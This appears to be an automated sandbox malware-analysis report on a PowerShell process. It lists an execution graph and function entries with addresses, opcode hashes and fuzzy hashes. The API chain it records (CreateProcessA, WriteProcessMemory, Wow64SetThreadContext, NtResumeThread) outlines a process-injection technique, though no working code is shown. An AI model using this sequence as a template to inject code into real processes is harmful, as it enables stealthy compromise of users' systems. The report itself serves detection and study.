                                                                        execution_graph 63411 6d94f48 63412 6d94f5d 63411->63412 63419 6d94f79 63412->63419 63423 6d95017 63412->63423 63427 6d95275 63412->63427 63431 6d9531b 63412->63431 63435 6d94f88 63412->63435 63413 6d94f73 63421 6d94f81 63419->63421 63420 6d94ff7 63420->63413 63421->63420 63439 6d965a0 63421->63439 63425 6d94fdf 63423->63425 63424 6d94ff7 63424->63413 63425->63424 63426 6d965a0 8 API calls 63425->63426 63426->63425 63429 6d94fdf 63427->63429 63428 6d94ff7 63428->63413 63429->63428 63430 6d965a0 8 API calls 63429->63430 63430->63429 63433 6d94fdf 63431->63433 63432 6d94ff7 63432->63413 63433->63432 63434 6d965a0 8 API calls 63433->63434 63434->63433 63437 6d94fb2 63435->63437 63436 6d94ff7 63436->63413 63437->63436 63438 6d965a0 8 API calls 63437->63438 63438->63437 63440 6d965c5 63439->63440 63443 6d96a19 63440->63443 63444 6d96b74 63443->63444 63445 6d9666b 63443->63445 63448 6d970f0 63444->63448 63459 6d97100 63444->63459 63449 6d970fa 63448->63449 63450 6d97137 63448->63450 63470 6d97935 63449->63470 63476 6d977e2 63449->63476 63481 6d976b0 63449->63481 63486 6d9746e 63449->63486 63491 6d9808d 63449->63491 63496 6d9759a 63449->63496 63501 6d97b34 63449->63501 63506 6d97355 63449->63506 63450->63445 63460 6d97115 63459->63460 63462 6d9759a 2 API calls 63460->63462 63463 6d9808d 2 API calls 63460->63463 63464 6d9746e 2 API calls 63460->63464 63465 6d976b0 2 API calls 63460->63465 63466 6d977e2 2 API calls 63460->63466 63467 6d97935 2 API calls 63460->63467 63468 6d97355 2 API calls 63460->63468 63469 6d97b34 2 API calls 63460->63469 63461 6d97137 63461->63445 63462->63461 63463->63461 63464->63461 63465->63461 63466->63461 63467->63461 63468->63461 63469->63461 63472 6d9794e 63470->63472 63471 6d97220 63472->63471 63511 6d9fea8 63472->63511 63515 6d9feb0 63472->63515 63473 6d97eaa 63477 6d977ee 63476->63477 63519 6d989c8 63477->63519 63523 6d989c6 63477->63523 63478 6d97220 63482 6d976c8 63481->63482 63541 6d9f838 63482->63541 63545 6d9f830 63482->63545 63483 6d97220 63487 6d97e6e 63486->63487 63489 6d9fea8 NtResumeThread 63487->63489 63490 6d9feb0 NtResumeThread 63487->63490 63488 6d97eaa 63489->63488 63490->63488 63492 6d9809c 63491->63492 63549 6d9ef88 63492->63549 63553 6d9ef90 63492->63553 63493 6d97220 63497 6d97c0f 63496->63497 63498 6d97220 63496->63498 63499 6d9ef88 Wow64SetThreadContext 63497->63499 63500 6d9ef90 Wow64SetThreadContext 63497->63500 63499->63498 63500->63498 63502 6d97b43 63501->63502 63504 6d9f838 WriteProcessMemory 63502->63504 63505 6d9f830 WriteProcessMemory 63502->63505 63503 6d97220 63503->63450 63504->63503 63505->63503 63507 6d9735b 63506->63507 63509 6d9f838 WriteProcessMemory 63507->63509 63510 6d9f830 WriteProcessMemory 63507->63510 63508 6d97220 63509->63508 63510->63508 63512 6d9feb0 NtResumeThread 63511->63512 63514 6d9ff2d 63512->63514 63514->63473 63516 6d9fef8 NtResumeThread 63515->63516 63518 6d9ff2d 63516->63518 63518->63473 63520 6d989df 63519->63520 63521 6d98a01 63520->63521 63527 6d991d6 63520->63527 63521->63478 63524 6d989df 63523->63524 63525 6d98a01 63524->63525 63526 6d991d6 2 API calls 63524->63526 63525->63478 63526->63525 63528 6d991e5 63527->63528 63532 6d9e888 63528->63532 63536 6d9e87c 63528->63536 63533 6d9e8ec CreateProcessA 63532->63533 63535 6d9ea74 63533->63535 63537 6d98a94 63536->63537 63538 6d9e87f CreateProcessA 63536->63538 63537->63521 63540 6d9ea74 63538->63540 63542 6d9f880 WriteProcessMemory 63541->63542 63544 6d9f8d7 63542->63544 63544->63483 63546 6d9f838 WriteProcessMemory 63545->63546 63548 6d9f8d7 63546->63548 63548->63483 63550 6d9ef90 Wow64SetThreadContext 63549->63550 63552 6d9f01d 63550->63552 63552->63493 63554 6d9efd5 Wow64SetThreadContext 63553->63554 63556 6d9f01d 63554->63556 63556->63493 63576 6d47370 63577 6d47385 63576->63577 63582 6d47574 63577->63582 63588 6d473a0 63577->63588 63594 6d473b0 63577->63594 63578 6d4739b 63584 6d47405 63582->63584 63583 6d4743c 63583->63578 63584->63583 63585 6d475b1 63584->63585 63600 6d47898 63584->63600 63585->63583 63587 6d47898 6 API calls 63585->63587 63587->63585 63591 6d473ad 63588->63591 63589 6d4743c 63589->63578 63590 6d475b1 63590->63589 63593 6d47898 6 API calls 63590->63593 63591->63589 63591->63590 63592 6d47898 6 API calls 63591->63592 63592->63591 63593->63590 63596 6d473da 63594->63596 63595 6d4743c 63595->63578 63596->63595 63597 6d475b1 63596->63597 63598 6d47898 6 API calls 63596->63598 63597->63595 63599 6d47898 6 API calls 63597->63599 63598->63596 63599->63597 63601 6d478a5 63600->63601 63607 6d478d6 63601->63607 63608 6d48294 63601->63608 63613 6d48319 63601->63613 63618 6d483b2 63601->63618 63623 6d484f2 63601->63623 63628 6d48d22 63601->63628 63607->63584 63609 6d482a3 63608->63609 63633 6d4cdbc 63609->63633 63637 6d4cdc8 63609->63637 63614 6d48328 63613->63614 63641 6d4d930 63614->63641 63645 6d4d938 63614->63645 63615 6d48356 63619 6d483ba 63618->63619 63649 6d4d5bc 63619->63649 63653 6d4d5c8 63619->63653 63624 6d483bb 63623->63624 63625 6d479ee 63623->63625 63626 6d4d5bc CreateFileMappingA 63624->63626 63627 6d4d5c8 CreateFileMappingA 63624->63627 63626->63625 63627->63625 63629 6d48294 63628->63629 63630 6d479ee 63628->63630 63631 6d4cdbc CreateFileA 63629->63631 63632 6d4cdc8 CreateFileA 63629->63632 63631->63630 63632->63630 63634 6d4cdc8 CreateFileA 63633->63634 63636 6d4cec3 63634->63636 63638 6d4ce1a CreateFileA 63637->63638 63640 6d4cec3 63638->63640 63642 6d4d938 MapViewOfFile 63641->63642 63644 6d4d9b5 63642->63644 63644->63615 63646 6d4d978 MapViewOfFile 63645->63646 63648 6d4d9b5 63646->63648 63648->63615 63650 6d4d5c8 CreateFileMappingA 63649->63650 63652 6d4d6c1 63650->63652 63654 6d4d61d CreateFileMappingA 63653->63654 63656 6d4d6c1 63654->63656 63557 6d65580 63558 6d65598 63557->63558 63559 6d656a3 63558->63559 63563 862917 63558->63563 63567 862610 63558->63567 63572 862a24 63558->63572 63564 862875 WriteProcessMemory 63563->63564 63566 862b1c 63564->63566 63566->63559 63569 862648 63567->63569 63568 86269e 63568->63559 63569->63568 63570 862ae1 WriteProcessMemory 63569->63570 63571 862b1c 63570->63571 63571->63559 63573 86297e WriteProcessMemory 63572->63573 63575 862b1c 63573->63575 63575->63559

                                                                        Executed Functions

                                                                        Function 06D9FEA8 Relevance: 1.6, APIs: 1, Instructions: 59nativethreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtResumeThread.NTDLL(?,?), ref: 06D9FF1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294202856.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 17aa3f233de36539b9abd129998c6bed7d87ae790cdf897cb443dfdd5e551bcf
                                                                        • Instruction ID: 0523e4b6bcadd90be302ebf5556c36f1dc3112c50c0427cd307a40d4ef5b91fb
                                                                        • Opcode Fuzzy Hash: 17aa3f233de36539b9abd129998c6bed7d87ae790cdf897cb443dfdd5e551bcf
                                                                        • Instruction Fuzzy Hash: DB1138B1D003099FDB50DFAAC88479EFBF4EF88224F108429D419A7200CB745904CFA4
                                                                        Function 06D9FEB0 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtResumeThread.NTDLL(?,?), ref: 06D9FF1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294202856.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: c57128a65f6db1fb60bd9eaf1566a301f79d5b5a9ca7cc440929d8cff78b020d
                                                                        • Instruction ID: 7d9e754f837c45a003853c71186486cecdc1e26ce48b400df815213d905a5d31
                                                                        • Opcode Fuzzy Hash: c57128a65f6db1fb60bd9eaf1566a301f79d5b5a9ca7cc440929d8cff78b020d
                                                                        • Instruction Fuzzy Hash: 8A11E7B1D003498FDB10DFAAC48579EFBF4AF88624F14842AD519A7240CB75A944CFA5
                                                                        Function 00DAB580 Relevance: 1.4, Instructions: 1434COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262145277.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_da0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 00a903f6cdd1fa3eaa77732cdeb2c17c7d55cf04ca086af91ecde15db5b50cef
                                                                        • Instruction ID: 3b7d54a2c1f747938434597bbf7a1a508414fffcda31832a913fbae4d7247fbb
                                                                        • Opcode Fuzzy Hash: 00a903f6cdd1fa3eaa77732cdeb2c17c7d55cf04ca086af91ecde15db5b50cef
                                                                        • Instruction Fuzzy Hash: DDD27074A05248DFCB05CF68D494A9DBFB1FF8A310F29819AE444AB362C735DD46CBA1
                                                                        Function 00E1A203 Relevance: .5, Instructions: 539COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262287141.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_e10000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b93127d8e63c9c5fffdaea7ca9a4b1932fe884be02cd20f596832d9fa8910d98
                                                                        • Instruction ID: 2e01cb1b227cda7b7dd1266b5b88a55920f2d2d4f9ab9a89773422194a731a0e
                                                                        • Opcode Fuzzy Hash: b93127d8e63c9c5fffdaea7ca9a4b1932fe884be02cd20f596832d9fa8910d98
                                                                        • Instruction Fuzzy Hash: 3452D374A04628CFCB64DF68C884B9ABBB2FB88305F1091E9D50DA7355DB30AE85DF51
                                                                        Function 06DB67A8 Relevance: .3, Instructions: 270COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aa07f984ef1b3816e6575284b456c93daa1c904d7b6c1023bd9e0750d4e4b9fa
                                                                        • Instruction ID: e81caf3fe32fbb7ca4296e67e6748902b50f4a2034c7e16a7449ec6967de6887
                                                                        • Opcode Fuzzy Hash: aa07f984ef1b3816e6575284b456c93daa1c904d7b6c1023bd9e0750d4e4b9fa
                                                                        • Instruction Fuzzy Hash: B5C11770E05258CFEB64CF69D844BEDBBF2BB4A300F6490A9D40AA7259DB70D985CF44
                                                                        Function 06DB7328 Relevance: .2, Instructions: 245COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f6907bfdf1c27e0f1504b6289f28aa6387cdb285ed02b6e45066cb5890c4e9fa
                                                                        • Instruction ID: bd8b8d466789c7588eca4cb49a017a315550302701a766981c6220acea825be3
                                                                        • Opcode Fuzzy Hash: f6907bfdf1c27e0f1504b6289f28aa6387cdb285ed02b6e45066cb5890c4e9fa
                                                                        • Instruction Fuzzy Hash: FCB1C670E05218CFEB64CFA9D484BEDBBF2BB89301F209069D41AA7355DB709985CF44
                                                                        Function 06DB67B8 Relevance: .2, Instructions: 243COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 86c71ddb3b250d98c6667bec7f51f01737709d9ecb35a19ea4e5af6ba19ef414
                                                                        • Instruction ID: 2c96ca90e2001c0723d51b1cc02c868d822994c365abc473668d39416e658e43
                                                                        • Opcode Fuzzy Hash: 86c71ddb3b250d98c6667bec7f51f01737709d9ecb35a19ea4e5af6ba19ef414
                                                                        • Instruction Fuzzy Hash: 3CB11770D05258CFEBA4CF69D844BEDBBF2BB4A300F54A0A9D04AA7259DB70D985CF44
                                                                        Function 06DB683A Relevance: .2, Instructions: 219COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f5a2decb532210f4a11341697da056c321cb9e4b925735ec0eb0e11138858fef
                                                                        • Instruction ID: 04ffec8d41f322b62c56edf563e02845c95d6490831b3c769e7b6a32545b92e2
                                                                        • Opcode Fuzzy Hash: f5a2decb532210f4a11341697da056c321cb9e4b925735ec0eb0e11138858fef
                                                                        • Instruction Fuzzy Hash: 7AA11670D05258CFEBA4CFA9C484BDDBBF2BB4A304F6490A9D00AA7258DB71D985CF44
                                                                        Function 06D473A0 Relevance: .2, Instructions: 217COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3293808970.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a72c268005d30af18568e898dddf72d8c5ad5a0fcd6f5b154f904ef742401efb
                                                                        • Instruction ID: 4639adc32127c6fe72785f2bb3e7cbeb8168e63441a404d7ad9bf487a797ff46
                                                                        • Opcode Fuzzy Hash: a72c268005d30af18568e898dddf72d8c5ad5a0fcd6f5b154f904ef742401efb
                                                                        • Instruction Fuzzy Hash: 9A91F470E04218CFDB94DFA9D854BAABBB2FB4A304F108069E409A7295DB349D85CF95
                                                                        Function 06DB6D21 Relevance: .2, Instructions: 216COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a577aeea87eea0093f3b763448c4a249a976447e41d1a438c177b54e32328e76
                                                                        • Instruction ID: 726f5b1d6be175473fdb29ba1df34214122e8af30aab0730ec57438908158003
                                                                        • Opcode Fuzzy Hash: a577aeea87eea0093f3b763448c4a249a976447e41d1a438c177b54e32328e76
                                                                        • Instruction Fuzzy Hash: A2A1F670D05258CFEBA4CF69D884BDDBBF2BB4A304F6490A9D00AA7258DB74D985CF44
                                                                        Function 06D473B0 Relevance: .2, Instructions: 215COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3293808970.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 963266ee592129fd2270380a01bc9daba74ab9fe9be4c84c74f497caf5602d4f
                                                                        • Instruction ID: 0815414ce5357f46e59631274a540afb9ebcb0c2e4a720b1bb914e8e69f0d370
                                                                        • Opcode Fuzzy Hash: 963266ee592129fd2270380a01bc9daba74ab9fe9be4c84c74f497caf5602d4f
                                                                        • Instruction Fuzzy Hash: E4910570E04218CFDB94DFA9D844BAEBBB2FB4A304F109069E409A7355DB349D85CF95
                                                                        Function 06DB6A30 Relevance: .2, Instructions: 215COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a6a5aba1d184071756370daf958905bc3e78c6106910cc63964b23b781ba4e16
                                                                        • Instruction ID: 0bdd78b1e48452ae3b7279c2797538bc727fcef389bd762e82283f181122428d
                                                                        • Opcode Fuzzy Hash: a6a5aba1d184071756370daf958905bc3e78c6106910cc63964b23b781ba4e16
                                                                        • Instruction Fuzzy Hash: 06A1F470D05258CFEBA4CF69C884BDDBBF2BB4A304F6490A9D00AA7258DB71D985CF44
                                                                        Function 06D47574 Relevance: .2, Instructions: 206COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3293808970.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 813d9625eca6abe35109bcf5d9b1bb96fb87ef205359013c3ee1475d41a45dc8
                                                                        • Instruction ID: bc1edc163fa3d7c2d9331edcb5754b355d53f53611ddf1ac6cd228bcc5a00e25
                                                                        • Opcode Fuzzy Hash: 813d9625eca6abe35109bcf5d9b1bb96fb87ef205359013c3ee1475d41a45dc8
                                                                        • Instruction Fuzzy Hash: EE810570E04208CFDB94DFA9D844BAABBF2FB4A304F149069E409A7255DB309D86CF95
                                                                        Function 06DB6B55 Relevance: .2, Instructions: 206COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1e4af3a2786f25a154b14fb8c4e0ed430cbfb24399f1c19d966ee60c4ee8961c
                                                                        • Instruction ID: f8b6e44bb9e7b6e1ae087ff1eba48cbf077b51b9816ba062b9044aba40f946e7
                                                                        • Opcode Fuzzy Hash: 1e4af3a2786f25a154b14fb8c4e0ed430cbfb24399f1c19d966ee60c4ee8961c
                                                                        • Instruction Fuzzy Hash: CEA1F670D05258CFEBA4CF69D884BDDBBF2BB4A304F6490A9D00AA7258DB71D985CF44
                                                                        Function 06DB7639 Relevance: .2, Instructions: 203COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bece924373ee863acece1418d32229b1b50d6a946707c7fa8789a04ec14c314d
                                                                        • Instruction ID: beae3d4833ae83146994ef5723e0e4786e51989579aeb699aeb57c94db45a29e
                                                                        • Opcode Fuzzy Hash: bece924373ee863acece1418d32229b1b50d6a946707c7fa8789a04ec14c314d
                                                                        • Instruction Fuzzy Hash: BF91D474E05218CFDB64CFA9D484BDDBBF2BB89301F2090A9E40AA7395DB709985CF44
                                                                        Function 06DB6875 Relevance: .2, Instructions: 202COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b97212540fc5dd02699b6c4b02b709120a09303f15f47a23525d0cb5914f699c
                                                                        • Instruction ID: 8e5e6c4f3708bd7bf76085dfd7f1faa984bfb2ac6c0d725032068ddb4c0e4476
                                                                        • Opcode Fuzzy Hash: b97212540fc5dd02699b6c4b02b709120a09303f15f47a23525d0cb5914f699c
                                                                        • Instruction Fuzzy Hash: F6910470D05258CFEBA4CF69D884BDDBBF2BB4A304F6490A9D00AA7258DB70D985CF44
                                                                        Function 07394350 Relevance: 12.7, Strings: 9, Instructions: 1457COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3297291785.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7390000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $a`i$(fi$(fi$(fi$(fi$4!$4!$</$</
                                                                        • API String ID: 0-2931130781
                                                                        • Opcode ID: d86002a10df2f42fcc27be0566a53bec6d21905f04ee6f2c3d8d413aec57f755
                                                                        • Instruction ID: 6a42f48149bcdf1c6bb681e203bd3684c9d89b5fa7765ee9df8b39371b169026
                                                                        • Opcode Fuzzy Hash: d86002a10df2f42fcc27be0566a53bec6d21905f04ee6f2c3d8d413aec57f755
                                                                        • Instruction Fuzzy Hash: 6EB2D5B5B00246DFEF15CBA8D850A6BBBA6AFC5314F24C07AD5098B781DB31DC52CB91
                                                                        Function 073962B8 Relevance: 8.3, Strings: 6, Instructions: 831COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3297291785.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7390000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 84i$84i$p(x9$Li$Li$Li
                                                                        • API String ID: 0-313819385
                                                                        • Opcode ID: 945cfca80b473cc8ec35627fc3ce229466880fd4d906e89ed31e21b926df859e
                                                                        • Instruction ID: d51c9e88ace15148c9205636c74dc0a447d8804dedd2efc4a83ef3a76ad42b3c
                                                                        • Opcode Fuzzy Hash: 945cfca80b473cc8ec35627fc3ce229466880fd4d906e89ed31e21b926df859e
                                                                        • Instruction Fuzzy Hash: 667268B4B00215DFEB24CB68C955B5AB7B2EF85304F14C0A9E9099B386DB72ED81CF51
                                                                        Function 06D63167 Relevance: 5.0, Strings: 3, Instructions: 1212COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 667 6d63167-6d6317a 668 6d63180-6d63204 667->668 669 6d63bec-6d63c35 667->669 680 6d63206-6d6322b 668->680 681 6d63233-6d632b0 668->681 683 6d627b6-6d627da 669->683 684 6d627af 669->684 680->681 704 6d632b2-6d632d7 681->704 705 6d632df-6d632ec 681->705 685 6d627dc-6d62801 683->685 686 6d62809-6d62869 683->686 684->683 689 6d62870-6d62894 684->689 685->686 686->689 690 6d62896-6d628bb 689->690 691 6d628c3-6d628d0 689->691 690->691 691->669 693 6d628d6-6d62904 691->693 693->669 700 6d6290a-6d62938 693->700 700->669 707 6d6293e-6d6296c 700->707 704->705 705->669 706 6d632f2-6d63340 705->706 706->669 717 6d63346-6d63362 706->717 707->669 712 6d62972-6d62a4f 707->712 732 6d62d15-6d62d39 712->732 733 6d62a55-6d62a6f 712->733 717->669 720 6d63368-6d633a5 717->720 720->669 725 6d633ab-6d633e9 720->725 725->669 731 6d633ef-6d634b6 725->731 731->669 763 6d634bc-6d6350c 731->763 734 6d62d3b-6d62d60 732->734 735 6d62d68-6d62e7e 732->735 736 6d62a71-6d62a96 733->736 737 6d62a9e-6d62aab 733->737 734->735 781 6d62e84-6d62e9e 735->781 782 6d630e1-6d6310f 735->782 736->737 738 6d62ab1-6d62af5 737->738 739 6d62ccc-6d62d10 737->739 738->739 752 6d62afb-6d62b1b 738->752 739->732 752->739 759 6d62b21-6d62b54 752->759 759->739 766 6d62b5a-6d62bba 759->766 763->669 775 6d63512-6d6356e 763->775 766->739 778 6d62bc0-6d62c6e 766->778 792 6d63573-6d635ba 775->792 778->739 807 6d62c70-6d62cca 778->807 789 6d62ea0-6d62eac 781->789 790 6d62ec8 781->790 805 6d63114-6d63164 782->805 793 6d62eb6-6d62ebc 789->793 794 6d62eae-6d62eb4 789->794 795 6d62ece-6d62f1c 790->795 802 6d635bc-6d635e1 792->802 803 6d635e9-6d6361e 792->803 797 6d62ec6 793->797 794->797 795->782 813 6d62f22-6d62f37 795->813 797->795 802->803 803->669 812 6d63624-6d63648 803->812 805->669 807->732 812->669 817 6d6364e-6d636aa 812->817 821 6d62f51-6d62f86 813->821 822 6d62f39-6d62f3f 813->822 840 6d636cf-6d636d5 817->840 841 6d636ac-6d636c1 817->841 821->782 834 6d62f8c-6d62fac 821->834 824 6d62f43-6d62f4f 822->824 825 6d62f41 822->825 824->821 825->821 834->782 837 6d62fb2-6d63096 834->837 837->782 866 6d63098-6d630df 837->866 842 6d636db-6d63722 840->842 841->842 846 6d63724-6d63749 842->846 847 6d63751-6d6375e 842->847 846->847 847->669 849 6d63764-6d63792 847->849 849->669 853 6d63798-6d637c6 849->853 853->669 857 6d637cc-6d637fa 853->857 857->669 860 6d63800-6d638dd 857->860 877 6d638e3-6d638fd 860->877 878 6d63c3a-6d63d42 860->878 866->805 879 6d638ff-6d63924 877->879 880 6d6392c-6d63939 877->880 886 6d63d44-6d63d69 878->886 887 6d63d71-6d63da6 878->887 879->880 882 6d63ba1-6d63bea 880->882 883 6d6393f-6d63983 880->883 882->669 882->878 883->882 896 6d63989-6d639a9 883->896 886->887 894 6d63e91-6d63ed5 887->894 895 6d63dac-6d63dda 887->895 914 6d63eda 894->914 895->894 900 6d63de0-6d63e52 895->900 896->882 904 6d639af-6d639e2 896->904 919 6d63e54-6d63e6f 900->919 920 6d63e80-6d63e86 900->920 904->882 912 6d639e8-6d63a48 904->912 912->882 922 6d63a4e-6d63aae 912->922 914->914 920->894 922->882 927 6d63ab4-6d63b3d 922->927 927->882 932 6d63b3f-6d63b9c 927->932 932->878
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294041535.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (fi$(fi$(fi
                                                                        • API String ID: 0-2959321493
                                                                        • Opcode ID: caa9abc0cba0e67ab6484ebbe126fd63d1025ef389a5cc8aa54797b3614001f0
                                                                        • Instruction ID: 828b68dabba0d9485b9f136a44444ca666d9ac5aa9a4ea4acbf2c7217138ec13
                                                                        • Opcode Fuzzy Hash: caa9abc0cba0e67ab6484ebbe126fd63d1025ef389a5cc8aa54797b3614001f0
                                                                        • Instruction Fuzzy Hash: 4FC24FB4A00214DFDB54CB58C894B99B7B2FB85700F55C1E9EA09AB341CB72DE82CF95
                                                                        Function 07394330 Relevance: 4.2, Strings: 3, Instructions: 488COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3297291785.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7390000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (fi$(fi$</
                                                                        • API String ID: 0-3475497408
                                                                        • Opcode ID: 86c4003d432b439dbb86fc235548be4a077fd5e4dddbff8a044682c20499da97
